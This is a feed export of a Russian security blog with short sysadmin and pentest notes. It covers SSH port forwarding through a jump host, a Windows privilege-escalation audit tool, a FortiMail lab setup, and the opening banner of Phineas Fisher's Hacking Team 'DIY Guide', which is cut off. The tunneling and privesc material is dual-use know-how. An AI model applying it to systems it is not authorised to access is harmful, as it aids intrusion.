tag:blogger.com,1999:blog-11427613031435776072024-03-06T00:41:18.800+02:00[Hack and Security] CookiesUnknownnoreply@blogger.comBlogger261125tag:blogger.com,1999:blog-1142761303143577607.post-86590295685164768222017-02-14T19:16:00.002+02:002017-02-14T19:17:28.948+02:00SecureCRT + форвард трафика [socks proxy]<div dir="ltr" style="text-align: left;" trbidi="on">
Для заворота всего трафика средствами SecureCRT создаем подключение к нашему промежуточному (master) хосту и указываем параметры проброса -<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEwGhyphenhyphenyqog1UH2VHUeSNrvWN6ApqhDnCf63S4LDZ68W2GQ3DxAqdt9wXv0Tao3K8RD9LUaIs-6qzYUubu-vPpEEMWKdM28BYCrdkEJ6p0XP98C1f1uRZ2g2xN73tkR3ffu0MYwsqYymiw/s1600/Monosnap+2017-02-14+18-54-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEwGhyphenhyphenyqog1UH2VHUeSNrvWN6ApqhDnCf63S4LDZ68W2GQ3DxAqdt9wXv0Tao3K8RD9LUaIs-6qzYUubu-vPpEEMWKdM28BYCrdkEJ6p0XP98C1f1uRZ2g2xN73tkR3ffu0MYwsqYymiw/s640/Monosnap+2017-02-14+18-54-38.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
В глобальных настройках создаем новое firewall правило -<br />
<br />
<a name='more'></a><br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWdFFxZOEn8pj6EEQ0Inj4PXhlDMLAVSf2hFzTKhRyGq2B4Nf7x8pHhV_AcKSQqFIm7osx6c0NUFF5lodQA_k0aUAqCf_nbc7mM7o6EpUNI3olUt7g1ZciEbcd7xmqndmdHcm7z71JpGY/s1600/Monosnap+2017-02-14+19-00-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWdFFxZOEn8pj6EEQ0Inj4PXhlDMLAVSf2hFzTKhRyGq2B4Nf7x8pHhV_AcKSQqFIm7osx6c0NUFF5lodQA_k0aUAqCf_nbc7mM7o6EpUNI3olUt7g1ZciEbcd7xmqndmdHcm7z71JpGY/s640/Monosnap+2017-02-14+19-00-27.png" width="640" /></a></div>
<br />
После чего создаем второе подключение, к хосту который находится за master хостом -<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNYTa1oQVag7tylp_toxV6Z2GiSm0Ce0YIWpQqwRX6GY_grNRvhhmPTbwDA7W0oZY2CI2r28YJrOw2fE_WTiTCmMgWBFMXA4hIPcAlGfesn35EpE0hmu7l5iQP2JqKZsAeSXXn1-tThBA/s1600/Monosnap+2017-02-14+19-02-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNYTa1oQVag7tylp_toxV6Z2GiSm0Ce0YIWpQqwRX6GY_grNRvhhmPTbwDA7W0oZY2CI2r28YJrOw2fE_WTiTCmMgWBFMXA4hIPcAlGfesn35EpE0hmu7l5iQP2JqKZsAeSXXn1-tThBA/s640/Monosnap+2017-02-14+19-02-48.png" width="640" /></a></div>
<br />
Теперь данный коннект будет подыматься через master.<br />
<br />
Для форварда http/https трафика для Chrome удобно использовать switchyomega<br />
<br />
(<a href="https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif?utm_source=chrome-ntp-icon">https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif?utm_source=chrome-ntp-icon</a>)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxsIdQ3TNX8mb9kwJhIorMPdCQMGpgCrGP-vLhifYPE6tdxPHFQel83pyUMjCDSr5BdCP0oIIXHRgsg7P9ABsRQRjRkBgdKQIhzzEQq7X0qlvgQ3Y54GPOxzCR7kev-lIV3nphxSOgkFM/s1600/Monosnap+2017-02-14+19-05-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxsIdQ3TNX8mb9kwJhIorMPdCQMGpgCrGP-vLhifYPE6tdxPHFQel83pyUMjCDSr5BdCP0oIIXHRgsg7P9ABsRQRjRkBgdKQIhzzEQq7X0qlvgQ3Y54GPOxzCR7kev-lIV3nphxSOgkFM/s640/Monosnap+2017-02-14+19-05-22.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Через стандартный шелл можно сделать так (только статик-порт):</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
[x:~]$ ssh -L localhost:8888:<TARGET>:22 user@<via></div>
<div class="separator" style="clear: both; text-align: left;">
[x:~]$ ssh user@localhost -p 8888</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-26884361424784506592016-08-02T00:06:00.000+03:002016-11-05T00:06:57.674+02:00A start job is running for raise network interfaces<div dir="ltr" style="text-align: left;" trbidi="on">
A start job is running for raise network interfaces:<br /><br />/etc/systemd/system/network-online.targets.wants/networking.service<br /><br />21:TimeoutStartSec=30sec</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-76892606836487536162016-06-13T13:40:00.002+03:002016-06-13T13:40:38.592+03:00Windows LPE check tool<div dir="ltr" style="text-align: left;" trbidi="on">
Тулза позволяет произвести аудит системы Windows, на предмет возможности локального повышения привилегий в системе.<br />
<br />
<div style="text-align: center;">
<a href="https://github.com/pentestmonkey/windows-privesc-check">https://github.com/pentestmonkey/windows-privesc-check</a></div>
<div style="text-align: center;">
<br /></div>
<b>Windows-privesc-check</b> is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).<br />It is written in python and converted to an executable using pyinstaller so it can be easily uploaded and run (as opposed to unzipping python + other dependencies). It can run either as a normal user or as Administrator (obviously it does a better job when running as Administrator because it can read more files). <div>
<br /></div>
<div>
<div style="text-align: center;">
<span style="color: #333333; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit;">C:\></span>windows-privesc-check2.exe --audit -a -o wpc-report</div>
<div>
<br /></div>
<b>QuickStartUsage:</b></div>
<div>
<br /><div>
<div style="text-align: center;">
<a href="https://github.com/pentestmonkey/windows-privesc-check/blob/master/docs/QuickStartUsage.md">https://github.com/pentestmonkey/windows-privesc-check/blob/master/docs/QuickStartUsage.md</a></div>
</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-59804314810686402982016-06-13T00:35:00.000+03:002016-10-23T00:35:41.123+03:00nmap xml to html<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
xsltproc <nmap-output.xml> -o <nmap-output.html></div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-18302518419034458632016-05-27T11:18:00.000+03:002016-05-27T11:18:01.747+03:00PHDays CTF: "Противостояние" глазами "защитника".<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<b>Автор:aodugin.blogspot.ru</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<a href="http://aodugin.blogspot.ru/2016/05/phdays-ctf-1.html">http://aodugin.blogspot.ru/2016/05/phdays-ctf-1.html</a></div>
<div style="text-align: center;">
<a href="http://aodugin.blogspot.ru/2016/05/phdays-ctf-2.html">http://aodugin.blogspot.ru/2016/05/phdays-ctf-2.html</a></div>
<div style="text-align: center;">
<a href="http://aodugin.blogspot.ru/2016/05/phdays-ctf-3.html">http://aodugin.blogspot.ru/2016/05/phdays-ctf-3.html</a></div>
<div style="text-align: center;">
<a href="http://aodugin.blogspot.ru/2016/05/phdays-ctf-4.html">http://aodugin.blogspot.ru/2016/05/phdays-ctf-4.html</a></div>
<div style="text-align: center;">
<a href="http://aodugin.blogspot.ru/2016/05/phdays-ctf-5.html">http://aodugin.blogspot.ru/2016/05/phdays-ctf-5.html</a></div>
<div style="text-align: center;">
<br /></div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-42149674349787632542016-05-20T17:14:00.000+03:002016-05-20T17:14:50.244+03:00SANS топ 20 утилит контроля ИБ<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-1">Part 1</a> - we look at Inventory of Authorized and Unauthorized Devices.<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-2">Part 2</a> - we look at Inventory of Authorized and Unauthorized Software.<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-3-secure-configurations">Part 3 </a>- we look at Secure Configurations.<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-4-continuous-vulnerability-assessment-remediation">Part 4</a> - we look at Continuous Vulnerability Assessment and Remediation.<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-5-malware-defenses-1">Part 5</a> - we look at Malware Defenses.<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-6-application-security">Part 6</a> - we look at Application Security<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-7-wireless-access-control">Part 7</a> - we look at Wireless Access Control<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-sans-top-20-security-controls-part-89-data-recovery-security-training">Part 8/9</a> – we look at Data Recovery and Security Training.<br />
<a href="https://www.alienvault.com/blogs/security-essentials/free-and-commercial-tools-to-implement-the-cis-security-controls-part-1011-secure-configurations-control-for-network">Part 10/11</a> - we look at Secure Configurations for Network Devices such as Firewalls, Routers, and Switches and Limitation and Control of Network Ports, Protocols and Services.</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-76029373792746354952016-05-13T17:24:00.001+03:002017-02-03T23:28:39.546+02:00Fortinet Fortimail and iRedMail configuration. [Gateway mode]<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
Мой опыт базовой настройки связки Fortimail и почтового сервера iRedMail.</div>
<br />
<div style="text-align: center;">
<img height="131" src="https://www.bms-consulting.com/wp-content/uploads/2015/07/Fortinet-logo.png" width="400" /></div>
Fortinet FortiMail – решение, предназначенное для защиты почтовых сервисов от DoS-атак, обнаружения и защиты от вирусов, вредоносного ПО во вложениях электронной почты, блокирования спама, а также маршрутизация корпоративной почты.<br />
Для начала, прописал MX записи, и доменные имена для нашей тестовой почты:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqf8mAP1u_F3I6bGu8g-JdQ3aaYGYF6M6TUxfkwaXQHjN8uE72oHJiwx-hCZM21w-kwJy-FRtQR3KJPQoGM2kn0-p_HVpu-rZ_-LjzbmFqaJRwn2BShkaer5VB12tIH-zh8i3W-qwXqAU/s1600/Clip2net_160513164956.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqf8mAP1u_F3I6bGu8g-JdQ3aaYGYF6M6TUxfkwaXQHjN8uE72oHJiwx-hCZM21w-kwJy-FRtQR3KJPQoGM2kn0-p_HVpu-rZ_-LjzbmFqaJRwn2BShkaer5VB12tIH-zh8i3W-qwXqAU/s640/Clip2net_160513164956.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
MX прописана на Fortimail </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Почтовый сервер я поднял на базе iRedmail.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
Примеры установки почтового сервера тут:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.iredmail.org/">http://www.iredmail.org/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://habrahabr.ru/post/96314/">https://habrahabr.ru/post/96314/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://trustore.ru/article/complex/223-iredmail-server-for-local">http://trustore.ru/article/complex/223-iredmail-server-for-local</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Прописал домен, и добавил пользователя в соответствующем меню в админке iRedmail :</div>
<div class="separator" style="clear: both; text-align: left;">
https://mx.lab.ua/iredadmin/domains</div>
<div class="separator" style="clear: both; text-align: left;">
https://mx.lab.ua/iredadmin/users/lab.ua</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
домены:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpgkpmB7HQifQ57Pmtj3lh4_T2ZGmJJ7sOvYW9t1y8HmTakr_0Hf2YIo7ZbvbewEtI-wluF3dq4Bf-N_Xq3Ez9T9330EKKqMjsZt-lkneK03TKQ21PMD6cKzG9mmigSV4IGSH91t_EZM8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpgkpmB7HQifQ57Pmtj3lh4_T2ZGmJJ7sOvYW9t1y8HmTakr_0Hf2YIo7ZbvbewEtI-wluF3dq4Bf-N_Xq3Ez9T9330EKKqMjsZt-lkneK03TKQ21PMD6cKzG9mmigSV4IGSH91t_EZM8/s640/1.png" width="640" /></a></div>
<br />
юзера:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Сам интерфейс пользователя построен на roundcube:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0IJdl9LmBCb1BduDfqiXHV0-eZrkK8ZVcQYwstHEHnQW_M5RQNjhMJUaL9VAuhsZ3a55N2VugnGxTXeIpJnov7WORPmwvb2Vpqsrl2flMsHW59NqTXAzLNxTs9QO5QBraMOGkjp89VEM/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0IJdl9LmBCb1BduDfqiXHV0-eZrkK8ZVcQYwstHEHnQW_M5RQNjhMJUaL9VAuhsZ3a55N2VugnGxTXeIpJnov7WORPmwvb2Vpqsrl2flMsHW59NqTXAzLNxTs9QO5QBraMOGkjp89VEM/s640/3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Далее, я отключаю все проверки на Postfix:</div>
<div class="separator" style="clear: both; text-align: left;">
в /etc/postfix/main.cf комментирую:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmarAynTWlf-QVI-n8GNZssrOdoOMMFGa69GNgIVhF6mID5u9OE3z4ZnGSYRuALxohwCGtmiXKpauGsmecc4kw4s58XDK380GESO0mCZnwP4SKznyfQ1QmZ36QFYd0QMlh_g-FnM3etgc/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="546" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmarAynTWlf-QVI-n8GNZssrOdoOMMFGa69GNgIVhF6mID5u9OE3z4ZnGSYRuALxohwCGtmiXKpauGsmecc4kw4s58XDK380GESO0mCZnwP4SKznyfQ1QmZ36QFYd0QMlh_g-FnM3etgc/s640/4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Далее, после проверки работы почты, (прием и отправка сообщений) я установил Fortimail.</div>
<div class="separator" style="clear: both; text-align: left;">
Использую виртуальный инстанс:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic3PozJ9Qwy93KNQONtur8sk5_-gyw2vwWh2Utj45JPY3qsYYbrd91de8RW1vvwbWtq1032FjA68HIGCEuTX2IMY5ntgSHaT5y1WX6IH4Um1f55Dchyphenhyphen-OOJ-9bKZ2I4uoODqAQW69yKeA/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic3PozJ9Qwy93KNQONtur8sk5_-gyw2vwWh2Utj45JPY3qsYYbrd91de8RW1vvwbWtq1032FjA68HIGCEuTX2IMY5ntgSHaT5y1WX6IH4Um1f55Dchyphenhyphen-OOJ-9bKZ2I4uoODqAQW69yKeA/s640/5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
После его предварительной настройки:</div>
<div class="separator" style="clear: both; text-align: left;">
Прописание адресов, аплоад файла лицензии, перезагрузки, у нас готовый фортимейл:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjaZXzFlzF7odMNplIAjjEzm-Ax9rVdPOmNaKzUiZkOtwDsuSJ8KV3LHS8DvG5n-INcuvA4z1h4ac3bMW5FLgnMx7T-a7gT3ftugHvLEi-KisHA_hHf2znyL14MEMOv6ZE5KHA4klke4M/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjaZXzFlzF7odMNplIAjjEzm-Ax9rVdPOmNaKzUiZkOtwDsuSJ8KV3LHS8DvG5n-INcuvA4z1h4ac3bMW5FLgnMx7T-a7gT3ftugHvLEi-KisHA_hHf2znyL14MEMOv6ZE5KHA4klke4M/s640/6.png" width="542" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Далее, нам нужно пописать базовые настройки, добавить домены для инспекции и навесить полиси:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Локал-домен:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1YhIctXLwY2-RHeqV3uQRm69Zlg2RNPt-ETN1OJjcSR_rYttXvMalt7X7IeOZd6Ympb8wW1BrxSYkwbvCbbHVT1SFO7b8H4jAA0rG7vKM32wJE8b5iprHddY5PknUKf1IVpTKm1aLExE/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1YhIctXLwY2-RHeqV3uQRm69Zlg2RNPt-ETN1OJjcSR_rYttXvMalt7X7IeOZd6Ympb8wW1BrxSYkwbvCbbHVT1SFO7b8H4jAA0rG7vKM32wJE8b5iprHddY5PknUKf1IVpTKm1aLExE/s1600/7.png" /></a></div>
<br />
Создаем домен, и прописываем наш почтовый сервер:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9-CzxLdoa5rFkGNUWtiSALihM-bqyrTc0QS__hIPds6mQtkfArLFLw_uLwENgR0l1jdBLIMNLhKssGBf1KTZ_T9tRMfDM8UCWW1MNKudHJojkQ_lNBVM2EkXCDc3nsHYuOLekI4OZPg/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9-CzxLdoa5rFkGNUWtiSALihM-bqyrTc0QS__hIPds6mQtkfArLFLw_uLwENgR0l1jdBLIMNLhKssGBf1KTZ_T9tRMfDM8UCWW1MNKudHJojkQ_lNBVM2EkXCDc3nsHYuOLekI4OZPg/s1600/8.png" /></a></div>
<br />
Тут ставим екшн в Relay:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1-YnwX0WrWc_PaDZfqvnqsD_b6CbC7MxbR9FW7PEOrBDUTcur-yjjmvMWWHt_kZDxQgGA50XZT-GqLR7c7-EvH343ue-m_RDw0FQsY27XYGCH61CxskINZc5b5JXSFRFcp64QiMfN4N4/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1-YnwX0WrWc_PaDZfqvnqsD_b6CbC7MxbR9FW7PEOrBDUTcur-yjjmvMWWHt_kZDxQgGA50XZT-GqLR7c7-EvH343ue-m_RDw0FQsY27XYGCH61CxskINZc5b5JXSFRFcp64QiMfN4N4/s640/9.png" width="640" /></a></div>
<br />
Вешаем полиси на домен, а так же активируем профили антиспама, антивируса и контента:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLN3zBPONBGenydC7Z-yIrhMsuDNpUCiJntR7SG9mBLiwUkFy3aUiDTrdVMYnjuySYL0lZxOAYYQze3GscyCYJF0Rf6Xfhw_KbEfz0cf6fM0AYMMp8XX9Lx_1VfFCV5s-MBwH9v1IwKZI/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLN3zBPONBGenydC7Z-yIrhMsuDNpUCiJntR7SG9mBLiwUkFy3aUiDTrdVMYnjuySYL0lZxOAYYQze3GscyCYJF0Rf6Xfhw_KbEfz0cf6fM0AYMMp8XX9Lx_1VfFCV5s-MBwH9v1IwKZI/s640/10.png" width="610" /></a></div>
<br />
Создаем новый профиль для аутентификации на почтовом сервере:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWM_Qdn7yugdcaqbMwY26BIKYU8NcQLjx7DrUg8E96WZzN-0MZzEUdEiMf3_UTdhxfEF8TEQ5FILB65pMLTQKnUhkbjbyHj25Hs2Q0Cn37DwEdm6a33-vyXe_gKU0Lt2rVmiwVS5CMh3k/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWM_Qdn7yugdcaqbMwY26BIKYU8NcQLjx7DrUg8E96WZzN-0MZzEUdEiMf3_UTdhxfEF8TEQ5FILB65pMLTQKnUhkbjbyHj25Hs2Q0Cn37DwEdm6a33-vyXe_gKU0Lt2rVmiwVS5CMh3k/s640/11.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Далее нам нужно проверить, проходит ли входящая почта через фортик, и попадает ли она на почтовый сервер. Для этого отправим сообщение с другого домена на тот, что мы создали в начале.</div>
<div class="separator" style="clear: both; text-align: left;">
Идем в логи фортика:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiICld4hq8SdHT3eYP_ECcFb8TvpFfREXnGxZWtdYPH8FOXuLawgpXBbyxZ2ggxYIep0LW2LhPi7_7-fs02XDibhEZXK-PUv_Gx14w_e5nl1GxiHZnxFJkHcVTeUu9GkwC2x9lrv6-O684/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiICld4hq8SdHT3eYP_ECcFb8TvpFfREXnGxZWtdYPH8FOXuLawgpXBbyxZ2ggxYIep0LW2LhPi7_7-fs02XDibhEZXK-PUv_Gx14w_e5nl1GxiHZnxFJkHcVTeUu9GkwC2x9lrv6-O684/s640/12.png" width="640" /></a></div>
Детали по письмам:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0S3UQ027Yeri9OUCkWlA4U0fOey3XBLSJy4By9DZXN6NoDIUTqQ-SQh-od_E0CO1n84iSWCUc59CHBnB8pTwtT-VexS9uFxBZ91iZ3iE5WK_Pf1q1qR7ii9mGQFJIPgpZrRlxGFB9qqU/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0S3UQ027Yeri9OUCkWlA4U0fOey3XBLSJy4By9DZXN6NoDIUTqQ-SQh-od_E0CO1n84iSWCUc59CHBnB8pTwtT-VexS9uFxBZ91iZ3iE5WK_Pf1q1qR7ii9mGQFJIPgpZrRlxGFB9qqU/s320/13.png" width="315" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Проверяем наш ящик:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrgXK3rpBPlMsLawkCyjKh6IfQPvnZKUWm8FJ7gLm1faYghedh2xlCzNmWPDT9JSTgFTpuv7Gbs6ntgOyh-npxUbEZivlZV7_LLw4d6I76bGUL_J01F37-RBXvN6rB3Dvvb3ypVQIDmSA/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrgXK3rpBPlMsLawkCyjKh6IfQPvnZKUWm8FJ7gLm1faYghedh2xlCzNmWPDT9JSTgFTpuv7Gbs6ntgOyh-npxUbEZivlZV7_LLw4d6I76bGUL_J01F37-RBXvN6rB3Dvvb3ypVQIDmSA/s640/14.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Первое сообщение с конца - тестовое сообщение до установки fortimail. </div>
<div class="separator" style="clear: both; text-align: left;">
Это личная заметка о быстром демонстрации решения и самой базовой конфигурации, которая требуется для наглядного примера работоспособности данной связки.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-84318365831033466262016-05-04T17:29:00.000+03:002016-09-15T17:29:27.848+03:00tmux<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
tmux attach || tmux new</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-10613752885081812602016-04-20T11:40:00.001+03:002016-04-20T11:41:58.027+03:00История взлома [Hacking Team]<div dir="ltr" style="text-align: left;" trbidi="on">
"Хакер, называющий себя Финиас Фишер (Phineas Fisher), <a href="http://pastebin.com/raw/0SNSvyjJ"><b>обнародовал на PasteBin</b></a> длинный и подробный рассказ о том, как летом 2015 года ему в одиночку удалось взломать известного поставщика шпионского ПО — компанию Hacking Team."<br />
<div>
<br />
<div>
Разбор взлома: <a href="https://xakep.ru/2016/04/18/hacking-team-hack/">https://xakep.ru/2016/04/18/hacking-team-hack/</a></div>
<div>
Реакция HT: <a href="https://xakep.ru/2016/04/20/hacking-team-letter/">https://xakep.ru/2016/04/20/hacking-team-letter/</a><br />
<br />
<div>
<pre style="white-space: pre-wrap; word-wrap: break-word;"> _ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide<a name='more'></a>
,-._,-._
_,-\ o O_/;
/ , ` `|
| \-.,___, / `
\ `-.__/ / ,.\
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || __ _ _ _____ __
.-"-._,(__) .(__).-""-. | | | | |_ _| |
/ \ / \ | | |_| | | | |
\ / \ / | | _ | | | |
`'-------` `--------'` __| |_| |_| |_| |__
#antisec
